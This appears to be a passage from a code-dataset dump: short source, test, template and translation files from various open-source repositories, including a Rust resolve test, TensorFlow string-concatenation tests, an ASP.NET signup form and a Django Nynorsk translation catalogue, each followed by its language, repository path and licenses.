| TypeScript | 4 | monciego/TypeScript | tests/cases/fourslash/completionsImport_uriStyleNodeCoreModules2.ts | [
"Apache-2.0"
] |
pub mod foo {
pub mod bar {
// note: trait T is not public, but being in the current
// crate, it's fine to show it, since the programmer can
// decide to make it public based on the suggestion ...
pub trait T {}
}
// imports should be ignored:
use self::bar::T;
}
pub mod baz {
pub use foo;
pub use std::ops::{Mul as T};
}
struct Foo;
impl T for Foo { }
//~^ ERROR cannot find trait `T`
fn main() {}
| Rust | 4 | Eric-Arellano/rust | src/test/ui/resolve/issue-21221-2.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
"""
BCE0018-3.boo(4,2): BCE0064: No attribute with the name 'Nonsense' or 'NonsenseAttribute' was found (attribute names are case insensitive).
"""
[Nonsense("libc")]
def TestAttributeSuggestion():
pass
| Boo | 0 | popcatalin81/boo | tests/testcases/errors/BCE0018-3.boo | [
"BSD-3-Clause"
] |
const A : [1..5] int = (1, 2, 3, 4, 5);
const B : [1..4] string = ("one", "two", "three", "four");
writeln(A);
writeln(B);
| Chapel | 3 | jhh67/chapel | test/arrays/deitz/part2/test_array_init_seq.chpl | [
"ECL-2.0",
"Apache-2.0"
] |
DROP TABLE "public"."table36";
| SQL | 1 | eazyfin/graphql-engine | cli/commands/testdata/migrate-squash-test/migrations/1588172670028_create_table_public_table36/down.sql | [
"Apache-2.0",
"MIT"
] |
module Message.ScrollDirection exposing (ScrollDirection(..))
type ScrollDirection
= ToTop
| Down
| Up
| ToBottom
| Sideways Float
| ToId String
| Elm | 4 | Caprowni/concourse | web/elm/src/Message/ScrollDirection.elm | [
"Apache-2.0"
] |
<%@ Page Title="Sign Up" Language="C#" MasterPageFile="~/Site.Master" AutoEventWireup="true" CodeBehind="SignUp.aspx.cs" Inherits="ProductLaunch.Web.SignUp" %>
<asp:Content ID="BodyContent" ContentPlaceHolderID="MainContent" runat="server">
<div class="jumbotron">
<h1>Sign me up!</h1>
</div>
<div class="row">
<div class="col-md-12">
<h2>Just a few details</h2>
</div>
</div>
<div class="form-group">
<label for="txtFirstName">First Name</label>
<asp:TextBox class="form-control" id="txtFirstName" runat="server"/>
</div>
<div class="form-group">
<label for="txtLastName">Last Name</label>
<asp:TextBox class="form-control" id="txtLastName" runat="server"/>
</div>
<div class="form-group">
<label for="txtEmail">Email Address</label>
<asp:TextBox class="form-control" id="txtEmail" runat="server" />
</div>
<div class="form-group">
<label for="ddlCountry">Country</label>
<asp:DropDownList class="form-control" id="ddlCountry" runat="server"/>
</div>
<div class="form-group">
<label for="txtCompanyName">Company Name</label>
<asp:TextBox class="form-control" id="txtCompanyName" runat="server"/>
</div>
<div class="form-group">
<label for="ddlRole">Your Main Role</label>
<asp:DropDownList class="form-control" id="ddlRole" runat="server" />
</div>
<asp:Button class="btn btn-default" runat="server" Text="Go!" ID="btnGo" OnClick="btnGo_Click" />
</asp:Content>
| ASP | 4 | ganeshkumardevops/docker | windows/modernize-traditional-apps/modernize-aspnet/v3-src/ProductLaunch/ProductLaunch.Web/SignUp.aspx | [
"Apache-2.0"
] |
<?Lassoscript
// Last modified 8/31/09 by ECL, Landmann InterActive
/*
Tagdocs;
{Tagname= OutputPortfolio }
{Description= Outputs the already-built $PortfolioContent }
{Author= Eric Landmann }
{AuthorEmail= support@iterate.ws }
{ModifiedBy= }
{ModifiedByEmail= }
{Date= 3/18/08 }
{Usage= OutputPortfolio: -Columns='5' }
{ExpectedResults= Outputs the HTML in $PortfolioContent in an HTML table }
{Dependencies= $PortfolioContent must be defined, otherwise there will be no output
$portfolio_thumb_array is a copy of the Records_Array from a search on Portfolio Entries }
{DevelNotes= $PortfolioContent is created in detail.inc.
This tag is merely a convenience to make it less awkward for a designer
It outputs the portfolio in ***one large block***, there is no pagination available.
Columns is the number of columns displayed in the portfolio.
Rows are automatically calculated and displayed. }
{ChangeNotes= 8/31/09
Integrated into itPage codebase. }
/Tagdocs;
*/
If: !(Lasso_TagExists:'OutputPortfolio');
Define_Tag:'OutputPortfolio',
-Description='Outputs $PortfolioContent, which contains the left nav content for the LI CMS 3.0',
-Required = 'Columns',
-Priority = 'replace';
Local:'Result' = null;
Local:'column_limit' = integer;
Local:'column_counter' = 0;
Local:'ThisPosition' = integer;
// Copy columns to column_limit to use in calculations
// Column_limit is the number of columns displayed in the portfolio
#column_limit = #columns;
// Check if $PortfolioContent is defined
If: (Var_Defined:'PortfolioContent');
// #Result += '\t<h3 class="PortfolioImage">Portfolio</h3>\n';
If: $svDebug == 'Y';
#Result += '<p class="debugCT">\n';
#Result += '60: portfolio_thumb_array = ' ($portfolio_thumb_array) '</p>\n';
/If;
#Result += '<!-- START Output Portfolio -->\n';
#Result += '<table width="100%">\n';
#Result += '\t<tr>\n';
#column_counter = 0;
Loop: ($portfolio_thumb_array->size);
#column_counter = (Math_Add: #column_counter, 1);
#Result += '\t\t<td valign="top">\n';
#Result += '\t\t\t<div class="PortfolioImage">\n';
Protect;
Local:'ThisPosition' = ($portfolio_thumb_array->(Get:(Loop_Count)));
Local:'ThisPosition_PortfolioID' = (#ThisPosition->Get:1);
Local:'ThisPosition_PortfolioTitle' = (#ThisPosition->Get:2);
Local:'ThisPosition_PortfolioCaption' = (#ThisPosition->Get:3);
Local:'ThisPosition_PortfolioURL' = (#ThisPosition->Get:4);
Local:'ThisPosition_PortfolioThumb' = (#ThisPosition->Get:5);
If: #ThisPosition_PortfolioTitle != '';
#Result += '\t\t\t\t<div class="PortfolioTitle">'(#ThisPosition_PortfolioTitle)'</div>\n';
/If;
If: #ThisPosition_PortfolioURL != '';
#Result += '\t\t\t<a href="'(#ThisPosition_PortfolioURL)'" target="_blank">';
Else;
#Result += '\t\t\t<a href="'($svImagesLrgPath)(#ThisPosition_PortfolioThumb)'" target="_blank">';
/If;
#Result += '<img src="'($svImagesThmbPath)(#ThisPosition_PortfolioThumb)'" alt="'(#ThisPosition_PortfolioThumb)'"></a><br>\n';
If: #ThisPosition_PortfolioCaption != '';
#Result += '\t\t\t</div>\n';
#Result += '\t\t\t<div class="PortfolioCaption">\n';
#Result += '\t\t\t\t'(#ThisPosition_PortfolioCaption)'<br>\n';
/If;
/Protect;
If: $svDebug == 'Y';
#Result += '<p class="debugCT">\n';
#Result += '143: ThisPosition = ' (#ThisPosition) '</p>\n';
/If;
#Result += '\t\t\t</div>\n';
#Result += '\t\t</td>\n';
// Add closing </tr> if end of column
If: (#column_counter == #column_limit);
#Result += '\t</tr><!-- 74 -->\n';
#column_counter = 0;
If: ((Loop_Count) != $ImageCount);
#Result += '\t<tr><!-- 77 -->\n';
/if;
/if;
/Loop;
#Result += '\t</tr><!-- 80 -->\n';
#Result += '\t<tr>\n';
#Result += '\t\t<td valign="top" colspan="'(#column_limit)'" align="center">';
// Navigation control
// Include:($svLibsPath)'nav_control_grid.inc';
#Result += '\t\t</td>\n';
#Result += '\t</tr>\n';
#Result += '</table>\n';
#Result += '<!-- END Output Portfolio -->\n';
Else;
If: $svDebug == 'Y';
#Result += 'Portfolio content is undefined<br>\n';
/If;
/If;
Return: (Encode_Smart:(#Result));
/Define_Tag;
Log_Critical: 'Custom Tag Loaded - OutputPortfolio';
/If;
?> | Lasso | 4 | subethaedit/SubEthaEd | Documentation/ModeDevelopment/Reference Files/LassoScript-HTML/itpage/LassoStartup/OutputPortfolio.lasso | [
"MIT"
] |
con currier = fold (fn nm => fn t => fn acc => t -> acc) {}
con greenCurryIngredients :: {Type} = []
con greenCurry = currier greenCurryIngredients
val greenCurry : greenCurry = {}
con redCurryIngredients = [A = int, B = string]
con redCurry = currier redCurryIngredients
val redCurry : redCurry = fn x : int => fn y : string => {}
con yellowCurryIngredients = [A = string, B = int, C = float]
con yellowCurry = currier yellowCurryIngredients
val yellowCurry : yellowCurry = fn x => fn y => fn z => {}
val main = yellowCurry
| UrWeb | 3 | apple314159/urweb | tests/cfold.ur | [
"BSD-3-Clause"
] |
/* Copyright 2015 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#include "tensorflow/core/platform/strcat.h"
#include <string>
#include "tensorflow/core/platform/stringprintf.h"
#include "tensorflow/core/platform/test.h"
#include "tensorflow/core/platform/types.h"
#ifdef _MSC_VER
// ssize_t is not a standard C++ type.
typedef ptrdiff_t ssize_t;
#endif
namespace tensorflow {
namespace strings {
// Test StrCat of ints and longs of various sizes and signdedness.
TEST(StrCat, Ints) {
const int16_t s = -1;
const uint16 us = 2;
const int i = -3;
const unsigned int ui = 4;
const int32_t l = -5;
const uint32 ul = 6;
const int64_t ll = -7;
const uint64 ull = 8;
const ptrdiff_t ptrdiff = -9;
const size_t size = 10;
const ssize_t ssize = -11;
const intptr_t intptr = -12;
const uintptr_t uintptr = 13;
string answer;
answer = tensorflow::strings::StrCat(s, us);
EXPECT_EQ(answer, "-12");
answer = tensorflow::strings::StrCat(i, ui);
EXPECT_EQ(answer, "-34");
answer = tensorflow::strings::StrCat(l, ul);
EXPECT_EQ(answer, "-56");
answer = tensorflow::strings::StrCat(ll, ull);
EXPECT_EQ(answer, "-78");
answer = tensorflow::strings::StrCat(ptrdiff, size);
EXPECT_EQ(answer, "-910");
answer = tensorflow::strings::StrCat(ssize, intptr);
EXPECT_EQ(answer, "-11-12");
answer = tensorflow::strings::StrCat(uintptr, 0);
EXPECT_EQ(answer, "130");
}
TEST(StrCat, Floats) {
const int s = 0;
const float f = 1.5f;
const double d = 1.5;
const bfloat16 bf(1.5f);
string answer;
answer = tensorflow::strings::StrCat(s, f);
EXPECT_EQ(answer, "01.5");
answer = tensorflow::strings::StrCat(s, d);
EXPECT_EQ(answer, "01.5");
answer = tensorflow::strings::StrCat(s, bf);
EXPECT_EQ(answer, "01.5");
}
TEST(StrCat, Basics) {
string result;
string strs[] = {"Hello", "Cruel", "World"};
StringPiece pieces[] = {"Hello", "Cruel", "World"};
const char *c_strs[] = {"Hello", "Cruel", "World"};
int32 i32s[] = {'H', 'C', 'W'};
uint64 ui64s[] = {12345678910LL, 10987654321LL};
result = tensorflow::strings::StrCat(false, true, 2, 3);
EXPECT_EQ(result, "0123");
result = tensorflow::strings::StrCat(-1);
EXPECT_EQ(result, "-1");
result = tensorflow::strings::StrCat(0.5);
EXPECT_EQ(result, "0.5");
result = tensorflow::strings::StrCat(strs[1], pieces[2]);
EXPECT_EQ(result, "CruelWorld");
result = tensorflow::strings::StrCat(strs[0], ", ", pieces[2]);
EXPECT_EQ(result, "Hello, World");
result =
tensorflow::strings::StrCat(strs[0], ", ", strs[1], " ", strs[2], "!");
EXPECT_EQ(result, "Hello, Cruel World!");
result =
tensorflow::strings::StrCat(pieces[0], ", ", pieces[1], " ", pieces[2]);
EXPECT_EQ(result, "Hello, Cruel World");
result =
tensorflow::strings::StrCat(c_strs[0], ", ", c_strs[1], " ", c_strs[2]);
EXPECT_EQ(result, "Hello, Cruel World");
result = tensorflow::strings::StrCat("ASCII ", i32s[0], ", ", i32s[1], " ",
i32s[2], "!");
EXPECT_EQ(result, "ASCII 72, 67 87!");
result = tensorflow::strings::StrCat(ui64s[0], ", ", ui64s[1], "!");
EXPECT_EQ(result, "12345678910, 10987654321!");
string one = "1"; // Actually, it's the size of this string that we want; a
// 64-bit build distinguishes between size_t and uint64,
// even though they're both unsigned 64-bit values.
result = tensorflow::strings::StrCat("And a ", one.size(), " and a ",
&result[2] - &result[0], " and a ", one,
" 2 3 4", "!");
EXPECT_EQ(result, "And a 1 and a 2 and a 1 2 3 4!");
// result = StrCat("Single chars won't compile", '!');
// result = StrCat("Neither will NULLs", NULL);
result = tensorflow::strings::StrCat(
"To output a char by ASCII/numeric value, use +: ", '!' + 0);
EXPECT_EQ(result, "To output a char by ASCII/numeric value, use +: 33");
float f = 100000.5;
result = tensorflow::strings::StrCat("A hundred K and a half is ", f);
EXPECT_EQ(result, "A hundred K and a half is 100000.5");
double d = f;
d *= d;
result = tensorflow::strings::StrCat("A hundred K and a half squared is ", d);
EXPECT_EQ(result, "A hundred K and a half squared is 10000100000.25");
result = tensorflow::strings::StrCat(1, 2, 333, 4444, 55555, 666666, 7777777,
88888888, 999999999);
EXPECT_EQ(result, "12333444455555666666777777788888888999999999");
}
TEST(StrCat, MaxArgs) {
string result;
// Test 10 up to 26 arguments, the current maximum
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a");
EXPECT_EQ(result, "123456789a");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b");
EXPECT_EQ(result, "123456789ab");
result =
tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c");
EXPECT_EQ(result, "123456789abc");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d");
EXPECT_EQ(result, "123456789abcd");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e");
EXPECT_EQ(result, "123456789abcde");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f");
EXPECT_EQ(result, "123456789abcdef");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g");
EXPECT_EQ(result, "123456789abcdefg");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h");
EXPECT_EQ(result, "123456789abcdefgh");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i");
EXPECT_EQ(result, "123456789abcdefghi");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j");
EXPECT_EQ(result, "123456789abcdefghij");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k");
EXPECT_EQ(result, "123456789abcdefghijk");
result =
tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d",
"e", "f", "g", "h", "i", "j", "k", "l");
EXPECT_EQ(result, "123456789abcdefghijkl");
result =
tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c", "d",
"e", "f", "g", "h", "i", "j", "k", "l", "m");
EXPECT_EQ(result, "123456789abcdefghijklm");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n");
EXPECT_EQ(result, "123456789abcdefghijklmn");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o");
EXPECT_EQ(result, "123456789abcdefghijklmno");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o", "p");
EXPECT_EQ(result, "123456789abcdefghijklmnop");
result = tensorflow::strings::StrCat(1, 2, 3, 4, 5, 6, 7, 8, 9, "a", "b", "c",
"d", "e", "f", "g", "h", "i", "j", "k",
"l", "m", "n", "o", "p", "q");
EXPECT_EQ(result, "123456789abcdefghijklmnopq");
// No limit thanks to C++11's variadic templates
result = tensorflow::strings::StrCat(
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, "a", "b", "c", "d", "e", "f", "g", "h",
"i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w",
"x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L",
"M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z");
EXPECT_EQ(result,
"12345678910abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ");
}
TEST(StrAppend, Basics) {
string result = "existing text";
string strs[] = {"Hello", "Cruel", "World"};
StringPiece pieces[] = {"Hello", "Cruel", "World"};
const char *c_strs[] = {"Hello", "Cruel", "World"};
int32 i32s[] = {'H', 'C', 'W'};
uint64 ui64s[] = {12345678910LL, 10987654321LL};
string::size_type old_size = result.size();
tensorflow::strings::StrAppend(&result, strs[0]);
EXPECT_EQ(result.substr(old_size), "Hello");
old_size = result.size();
tensorflow::strings::StrAppend(&result, strs[1], pieces[2]);
EXPECT_EQ(result.substr(old_size), "CruelWorld");
old_size = result.size();
tensorflow::strings::StrAppend(&result, strs[0], ", ", pieces[2]);
EXPECT_EQ(result.substr(old_size), "Hello, World");
old_size = result.size();
tensorflow::strings::StrAppend(&result, strs[0], ", ", strs[1], " ", strs[2],
"!");
EXPECT_EQ(result.substr(old_size), "Hello, Cruel World!");
old_size = result.size();
tensorflow::strings::StrAppend(&result, pieces[0], ", ", pieces[1], " ",
pieces[2]);
EXPECT_EQ(result.substr(old_size), "Hello, Cruel World");
old_size = result.size();
tensorflow::strings::StrAppend(&result, c_strs[0], ", ", c_strs[1], " ",
c_strs[2]);
EXPECT_EQ(result.substr(old_size), "Hello, Cruel World");
old_size = result.size();
tensorflow::strings::StrAppend(&result, "ASCII ", i32s[0], ", ", i32s[1], " ",
i32s[2], "!");
EXPECT_EQ(result.substr(old_size), "ASCII 72, 67 87!");
old_size = result.size();
tensorflow::strings::StrAppend(&result, ui64s[0], ", ", ui64s[1], "!");
EXPECT_EQ(result.substr(old_size), "12345678910, 10987654321!");
string one = "1"; // Actually, it's the size of this string that we want; a
// 64-bit build distinguishes between size_t and uint64,
// even though they're both unsigned 64-bit values.
old_size = result.size();
tensorflow::strings::StrAppend(&result, "And a ", one.size(), " and a ",
&result[2] - &result[0], " and a ", one,
" 2 3 4", "!");
EXPECT_EQ(result.substr(old_size), "And a 1 and a 2 and a 1 2 3 4!");
// result = StrCat("Single chars won't compile", '!');
// result = StrCat("Neither will NULLs", NULL);
old_size = result.size();
tensorflow::strings::StrAppend(
&result, "To output a char by ASCII/numeric value, use +: ", '!' + 0);
EXPECT_EQ(result.substr(old_size),
"To output a char by ASCII/numeric value, use +: 33");
float f = 100000.5;
old_size = result.size();
tensorflow::strings::StrAppend(&result, "A hundred K and a half is ", f);
EXPECT_EQ(result.substr(old_size), "A hundred K and a half is 100000.5");
double d = f;
d *= d;
old_size = result.size();
tensorflow::strings::StrAppend(&result, "A hundred K and a half squared is ",
d);
EXPECT_EQ(result.substr(old_size),
"A hundred K and a half squared is 10000100000.25");
// Test 9 arguments, the old maximum
old_size = result.size();
tensorflow::strings::StrAppend(&result, 1, 22, 333, 4444, 55555, 666666,
7777777, 88888888, 9);
EXPECT_EQ(result.substr(old_size), "1223334444555556666667777777888888889");
// No limit thanks to C++11's variadic templates
old_size = result.size();
tensorflow::strings::StrAppend(
&result, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, "a", "b", "c", "d", "e", "f", "g",
"h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v",
"w", "x", "y", "z", "A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K",
"L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z",
"No limit thanks to C++11's variadic templates");
EXPECT_EQ(result.substr(old_size),
"12345678910abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
"No limit thanks to C++11's variadic templates");
}
TEST(StrAppend, Death) {
string s = "self";
EXPECT_DEBUG_DEATH(strings::StrAppend(&s, s.c_str() + 1), "Check failed:");
EXPECT_DEBUG_DEATH(strings::StrAppend(&s, s), "Check failed:");
}
static void CheckHex64(uint64 v) {
using tensorflow::strings::Hex;
string actual = StrCat(Hex(v, tensorflow::strings::kZeroPad16));
string expected = Printf("%016llx", static_cast<unsigned long long>(v));
EXPECT_EQ(expected, actual) << " decimal value " << v;
actual = StrCat(Hex(v, tensorflow::strings::kZeroPad8));
expected = Printf("%08llx", static_cast<unsigned long long>(v));
EXPECT_EQ(expected, actual) << " decimal value " << v;
actual = StrCat(Hex(v));
expected = Printf("%llx", static_cast<unsigned long long>(v));
EXPECT_EQ(expected, actual) << " decimal value " << v;
}
static void CheckHex32(uint32 v) {
using tensorflow::strings::Hex;
string actual = StrCat(Hex(v, tensorflow::strings::kZeroPad8));
string expected = Printf("%08x", v);
EXPECT_EQ(expected, actual) << " decimal value " << v;
actual = StrCat(Hex(v));
expected = Printf("%x", v);
EXPECT_EQ(expected, actual) << " decimal value " << v;
}
static void CheckHexSigned32(int32_t v) {
using tensorflow::strings::Hex;
string actual = StrCat(Hex(v, tensorflow::strings::kZeroPad8));
string expected = Printf("%08x", v);
EXPECT_EQ(expected, actual) << " decimal value " << v;
actual = StrCat(Hex(v));
expected = Printf("%x", v);
EXPECT_EQ(expected, actual) << " decimal value " << v;
}
static void TestFastPrints() {
using tensorflow::strings::Hex;
// Test min int to make sure that works
for (int i = 0; i < 10000; i++) {
CheckHex64(i);
CheckHex32(i);
CheckHexSigned32(i);
CheckHexSigned32(-i);
}
CheckHex64(0x123456789abcdef0ull);
CheckHex32(0x12345678);
int8_t minus_one_8bit = -1;
EXPECT_EQ("ff", tensorflow::strings::StrCat(Hex(minus_one_8bit)));
int16_t minus_one_16bit = -1;
EXPECT_EQ("ffff", tensorflow::strings::StrCat(Hex(minus_one_16bit)));
}
TEST(Numbers, TestFunctionsMovedOverFromNumbersMain) { TestFastPrints(); }
} // namespace strings
} // namespace tensorflow
| C++ | 5 | EricRemmerswaal/tensorflow | tensorflow/core/platform/strcat_test.cc | [
"Apache-2.0"
] |
extends /templates/core/modal-base
block modal-header-content
h3 Campaign Analytics
if campaignCompletions.startDay && campaignCompletions.endDay
.input-group.input-group-sm
input.form-control#input-startday(type='text', style='width:100px;', value=campaignCompletions.startDay)
input.form-control#input-endday(type='text', style='width:100px;', value=campaignCompletions.endDay)
button.btn.btn-default.btn-sm#reload-button(style='margin-left:10px;') Reload
label(style='font-size:10px;font-weight:normal;')
span Double-click row to open level details.
span
input#option-show-left-game(type='checkbox', checked=showLeftGame)
span Show Left Game
span
input#option-show-subscriptions(type='checkbox', checked=showSubscriptions)
span Show Subscriptions
block modal-body-content
if campaignCompletions && campaignCompletions.levels
table.table.table-bordered.table-condensed.table-hover(style='font-size:10pt')
thead
tr
td.level Level
td Started
td Finished
td.completion-rate Completion %
td Playtime (s)
if showLeftGame
td Left Game
td LG %
td LG/s
if showSubscriptions
td Sub Shown
td Sub Purchased
tbody
- for (var i = 0; i < campaignCompletions.levels.length; i++)
tr.level(data-level-slug=campaignCompletions.levels[i].level)
td.level-name-container= campaignCompletions.levels[i].level
span.level-name-background(style="width:#{campaignCompletions.levels[i].usersRemaining || 0}%;")
td= campaignCompletions.levels[i].started
td= campaignCompletions.levels[i].finished
if campaignCompletions.levels[i].completionRate
if campaignCompletions.top3 && campaignCompletions.top3.indexOf(campaignCompletions.levels[i].level) >= 0
td.level-completion-container(style='background-color:lightblue;')= campaignCompletions.levels[i].completionRate.toFixed(2)
svg.level-completion-background(id="background#{campaignCompletions.levels[i].level}")
else if campaignCompletions.bottom3 && campaignCompletions.bottom3.indexOf(campaignCompletions.levels[i].level) >= 0
td.level-completion-container(style='background-color:pink;')= campaignCompletions.levels[i].completionRate.toFixed(2)
svg.level-completion-background(id="background#{campaignCompletions.levels[i].level}")
else
td.level-completion-container= campaignCompletions.levels[i].completionRate.toFixed(2)
svg.level-completion-background(id="background#{campaignCompletions.levels[i].level}")
else
td.completion-rate
if campaignCompletions.levels[i].averagePlaytime
td.level-playtime-container= campaignCompletions.levels[i].averagePlaytime.toFixed(2)
span.level-playtime-background(style="width:#{campaignCompletions.levels[i].playtimePercentage || 0}%;")
else
td
if showLeftGame
td= campaignCompletions.levels[i].dropped
if campaignCompletions.levels[i].dropPercentage
if campaignCompletions.top3DropPercentage && campaignCompletions.top3DropPercentage.indexOf(campaignCompletions.levels[i].level) >= 0
td(style='background-color:pink;')= campaignCompletions.levels[i].dropPercentage.toFixed(2)
else
td= campaignCompletions.levels[i].dropPercentage.toFixed(2)
else
td
if campaignCompletions.levels[i].droppedPerSecond
if campaignCompletions.top3DropPerSecond && campaignCompletions.top3DropPerSecond.indexOf(campaignCompletions.levels[i].level) >= 0
td(style='background-color:pink;')= campaignCompletions.levels[i].droppedPerSecond.toFixed(2)
else
td= campaignCompletions.levels[i].droppedPerSecond.toFixed(2)
else
td
if showSubscriptions
td= campaignCompletions.levels[i].subsShown
td= campaignCompletions.levels[i].subsPurchased
else
div Loading...
block modal-footer | Jade | 3 | cihatislamdede/codecombat | app/templates/editor/campaign/campaign-analytics-modal.jade | [
"CC-BY-4.0",
"MIT"
] |
# This file is distributed under the same license as the Django package.
#
# Translators:
# Jannis Leidel <jannis@leidel.info>, 2011
# Sivert Olstad, 2021
msgid ""
msgstr ""
"Project-Id-Version: django\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2021-09-21 10:22+0200\n"
"PO-Revision-Date: 2021-11-12 08:38+0000\n"
"Last-Translator: Sivert Olstad\n"
"Language-Team: Norwegian Nynorsk (http://www.transifex.com/django/django/"
"language/nn/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"Language: nn\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
msgid "Personal info"
msgstr "Personleg informasjon"
msgid "Permissions"
msgstr "Løyve"
msgid "Important dates"
msgstr "Viktige datoar"
#, python-format
msgid "%(name)s object with primary key %(key)r does not exist."
msgstr "%(name)s-objekt med primærnøkkelen %(key)r eksisterer ikkje."
msgid "Password changed successfully."
msgstr "Passordet er endra."
#, python-format
msgid "Change password: %s"
msgstr "Endre passord: %s"
msgid "Authentication and Authorization"
msgstr "Stadfesting og Autorisasjon"
msgid "password"
msgstr "passord"
msgid "last login"
msgstr "siste innlogging"
msgid "No password set."
msgstr "Passord ikkje sett."
msgid "Invalid password format or unknown hashing algorithm."
msgstr "Ugyldig passordformat eller ukjend hash-algoritme."
msgid "The two password fields didn’t match."
msgstr "Dei to passordfelta er ikkje like."
msgid "Password"
msgstr "Passord"
msgid "Password confirmation"
msgstr "Stadfesting av passord"
msgid "Enter the same password as before, for verification."
msgstr "Skriv inn det samme passordet som før, for verifisering."
msgid ""
"Raw passwords are not stored, so there is no way to see this user’s "
"password, but you can change the password using <a href=\"{}\">this form</a>."
msgstr ""
"Sjølve passordet vert ikkje lagra, så det finnast ingen måte å sjå denne "
"brukaren sitt passord, men du kan endra passordet med <a href=\"{}\">dette "
"skjemaet</a>."
#, python-format
msgid ""
"Please enter a correct %(username)s and password. Note that both fields may "
"be case-sensitive."
msgstr ""
"Oppgje korrekt %(username)s og passord. Merk at det er skilnad på små og "
"store bokstavar."
msgid "This account is inactive."
msgstr "Denne kontoen er inaktiv."
msgid "Email"
msgstr "E-post"
msgid "New password"
msgstr "Nytt passord"
msgid "New password confirmation"
msgstr "Stadfest nytt passord"
msgid "Your old password was entered incorrectly. Please enter it again."
msgstr "Det gamle passordet er feil. Prøv omatt."
msgid "Old password"
msgstr "Gammalt passord"
msgid "Password (again)"
msgstr "Passord (gjenta)"
msgid "algorithm"
msgstr "algoritme"
msgid "iterations"
msgstr "iterasjonar"
msgid "salt"
msgstr "salt"
msgid "hash"
msgstr "hash"
msgid "variety"
msgstr "variasjon"
msgid "version"
msgstr "versjon"
msgid "memory cost"
msgstr "minnekostnad"
msgid "time cost"
msgstr "tidskostnad"
msgid "parallelism"
msgstr "parallellitet"
msgid "work factor"
msgstr "arbeidsfaktor"
msgid "checksum"
msgstr "kontrollsum"
msgid "block size"
msgstr "blokkstorleik"
msgid "name"
msgstr "namn"
msgid "content type"
msgstr "innhaldstype"
msgid "codename"
msgstr "kodenamn"
msgid "permission"
msgstr "løyve"
msgid "permissions"
msgstr "løyve"
msgid "group"
msgstr "gruppe"
msgid "groups"
msgstr "grupper"
msgid "superuser status"
msgstr "superbrukar"
msgid ""
"Designates that this user has all permissions without explicitly assigning "
"them."
msgstr "Angir at denne brukaren har alle løyve utan å eksplisitt sette dei."
msgid ""
"The groups this user belongs to. A user will get all permissions granted to "
"each of their groups."
msgstr ""
"Gruppene brukaren tilhøyrer. Brukarar får løyva til gruppene dei er med i."
msgid "user permissions"
msgstr "Brukerløyve"
msgid "Specific permissions for this user."
msgstr "Løyva til denne brukaren."
msgid "username"
msgstr "brukarnamn"
msgid "Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only."
msgstr "Nødvendig. 150 teikn eller færre. Berre bokstavar, tall @/./+/-/_."
msgid "A user with that username already exists."
msgstr "Det eksisterar allereie ein brukar med dette brukernamnet."
msgid "first name"
msgstr "fornamn"
msgid "last name"
msgstr "etternamn"
msgid "email address"
msgstr "e-postadresse"
msgid "staff status"
msgstr "administrasjonsstatus"
msgid "Designates whether the user can log into this admin site."
msgstr "Angir at brukaren kan logge inn på denne administrasjonssida."
msgid "active"
msgstr "aktiv"
msgid ""
"Designates whether this user should be treated as active. Unselect this "
"instead of deleting accounts."
msgstr ""
"Angir at denne brukaren er aktiv. Avmerk denne i staden for å slette kontoen."
msgid "date joined"
msgstr "registrert"
msgid "user"
